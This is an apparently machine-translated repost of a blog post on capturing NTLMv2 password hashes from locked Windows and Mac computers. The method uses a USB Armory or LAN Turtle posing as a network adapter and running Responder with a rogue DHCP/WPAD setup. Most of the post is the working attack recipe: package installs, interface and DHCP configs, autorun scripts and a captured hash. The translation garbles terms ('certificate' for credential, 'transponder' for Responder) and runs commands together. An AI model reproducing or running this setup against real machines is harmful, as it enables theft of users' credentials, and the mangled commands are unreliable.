NSA professional physical intrusion device--usb Armory, can unlock any lock screen status under the Windows and Mac operating system, including the latest released Windows10, and earlier Mac OSX El Capitan/mavericks, want to know what the principle is? Come and see it!
First of all, this was not possible, but the truth is I really did (believe me, because I can't believe it's true, I've tested it many times.) )
USB Ethernet + DHCP + Responder = = Certificate
Topic:
If I insert a device that pretends to be a USB Ethernet adapter on my computer, I can get a certificate from the system even if the system is locked. (There may be more things to do, but this article is too long and we'll discuss it later.) )
1. Setup of the device
At the beginning of the article, I experimented with a USB Armory ($ 155), but in the following I'll show you how to do that with Hak5 Turtle ($ 49.99).
I will provide you with information about the settings of the device itself, and here are some links to help you:
USB Armory Bundle
- Debian/jessie-https://github.com/inversepath/usbarmory/wiki/starting#preparing-your-own-microsd-card
- Kali on USB armory-http://docs.kali.org/kali-on-arm/kali-linux-on-usb-armory
- Resizing the SD partition-http://base16.io/?p=61
Hak5 LAN Turtle
- Turtle Video Guides and wiki:https://lanturtle.com/wiki/#!videos.md
2. Tools
Basically, the Laurent Gaffié can be used to complete the capture, so you need to find a way to map the transponder to the device, and Hak5 Turtle already has one of these modules:
For the first time, you must set the module to "Enable" and then it will download all related items and packages by itself.
Then you need a opkg update and opkg install PYTHON-OPENSSL so that the transponder can run correctly.
As for USB Armory, you can use SCP, network Connection Sharing, USB host/client adapter:
Python is not installed in the default installation of Debian/jessie, so you must resolve all dependencies (this is not required in the Kali version) and require Internet access to perform the following:
Apt-get install-y python git python-pip python-dev screen sqlite3pip install Pycryptogit clone Https://github.com/spiderl Abs/responder
3. Configuration
USB Armory Bundle
First, it is not necessary to set up an interface, but since each image of Armory has a different default IP address, setting it can improve consistency, so it can lay a solid foundation for the next step.
/etc/network/interfaces# Interfaces (5) file used by Ifup (8) and Ifdown (8) # Include files From/etc/network/interfaces.d:s Ource-directory/etc/network/interfaces.dauto usb0allow-hotplug usb0iface usb0 inet static address 192.168.2.201 netmask 255.255.255.0 Gateway 192.168.2.1
Next, let's build a DHCP server:
/etc/dhcp/dhcpd.confddns-update-style none;option domain-name "domain.local"; option Domain-name-servers 192.168.2.201;default-lease-time 60;max-lease-time 72;# If This DHCP server was the official DHCP server for the local# net Work, the authoritative directive should is uncommented.authoritative;# use the-send DHCP log messages to a different Log file (you also# has to hack syslog.conf to complete the redirection). Log-facility local7;# wpadoption Local-proxy-con Fig Code 252 = text;# A Slightly different configuration for a internal subnet.subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.1 192.168.2.2; Option routers 192.168.2.201;
The only special configuration here is to send the "Proxy Config" option to the DHCP client. Please note this line:
A Wikipedia article on WPAD said: "DHCP has a higher priority than DNS: If DHCP provides a WPAD URL, DNS lookups will not execute. “
Next, we need to set up Autorun. We edited the rc.local file and let it do a few things like this:
- Clean out all DHCP leases and start the DHCP server. There may still be a better way, but because the "computer" is plugged in and out very often, the file can be damaged to some extent, so we just removed it and added it again.
- Start the responder in a screen session. This allows us to get a record of the screen session as a backup of the log files created by the Sqlite3 database and the responder.
/etc/rc.local#!/bin/sh-e# Clear leasesrm-f/var/lib/dhcp/dhcpd.leasestouch/var/lib/dhcp/dhcpd.leases# Start DHCP server/usr/sbin/dhcpd# Start responder/usr/bin/screen-dms Responder bash-c ' cd/root/responder/; Python responder.py-i usb0-f-w-r-d-f ' exit 0
In order for the screen session to be enabled for logging (allowing you to quickly identify the problem), you need to add a. screenrc file. The most important parts are:
/root/.screenrc# Loggingdeflog Onlogfile/root/logs/screenlog_$user_.%h.%n.%y%m%d-%0c:%s.%t.log
That's it, now you should be able to reboot the USB armory and start getting the credentials anywhere you can plug in the USB.
Hak5 LAN Turtle
Now, everything is almost done, the only difference is that OPKG is your package Manager:
opkg updateopkg Install Python-openssl screen
Move the symbolic link to/tmp/so that the log will be preserved
rm-rf/overlay/etc/turtle/responder/logs/overlay/etc/rc.local files are slightly different/overlay/etc/rc.local/etc/init.d/dnsmasq stop /usr/sbin/screen-dms responder bash-c ' Cd/overlay/etc/turtle/responder; Python responder.py-i br-lan-f-w-r-d-f '
4. Why does it work?
- Because USB is Plug and play, this means that even if a system is locked, USB can still be installed. I think that in the new operating system (Win10/el Capitan), certain types of devices can be installed in their locked state when it is limited, but Ethernet/lan must be in the whitelist.
- Even if you do not open any browsers or applications, the computer is still constantly creating traffic, for some reason, most computers will trust their local network.
- Network preferences are usually based on the combination of "metrics" on windows and OSX on metrics and "preference", but by default, wired and Newer/faster always become winners.
This means that, because of the transponder, after inserting the device, it quickly becomes a gateway, a DNS server, a WPAD server, and so on.
From inserting a locked workstation to acquiring a certificate, it takes about 13 seconds on average, depending on the state of the system. In addition, I used inotify to observe the changes in the files in the Responder.db database and to close the armory. It can also give me an indication that the certificate has been obtained by the LED.
To do this, you need to install the Inotify-tools package and add the following to the Therc.local local file:
echo "Staring cred watch" >>/root/rc.log/usr/bin/screen-dms notify Bash-c ' while Inotifywait-e modify/root/resp onder/responder.db; Do shutdown-h now; Done
5. Final Result:
You can see the Windows 10 lock screen in the video. When the LED is signaled, the armory is completely closed and the certificate has been obtained!
* In the video upload *
Observation results:
[Email protected]:~# sqlite3/root/responder/responder.db ' select * from responder ' 2016-09-04 10:59:43| http| ntlmv2|192.168.2.1| | sittingduck\mubix| | 5eaea2859c397d8ae48ca87f:0 1010000000001e9d23f49f7891f38965d80a0010000000000000000000000000000000900260048005400540050002f00780078006600660073006200 6E0070006300000000000000 .....
The step is complete.
Test success in the following systems:
Windows 98 SE
Windows SP4
Windows XP SP3
Windows 7 SP1
Windows Ten (Enterprise and Home editions)
OSX El capitan/mavericks (I can get a certificate in it, but I'm still testing if it's an accident)
I haven't tested it on Linux, and if I do, I'll write another article.
Comparison of 6.USB Armory with Hak5 LAN Turtle
- Armory is more versatile and is a good way to launch attacks. With more storage space (SD) and faster processors.
- In a se attack, if you try to plug in a device, the Hak5 LAN turtle is easier to complete the task. It may not be the same as armory, there is an LED indication when the certificate is obtained, but it has an additional function that can be used as an Ethernet port, so you can get a certificate and a shell.
Original address:https://room362.com/post/2016/snagging-creds-from-locked-machines/
Unlock Windows & Mac lock screen Status with a malicious USB device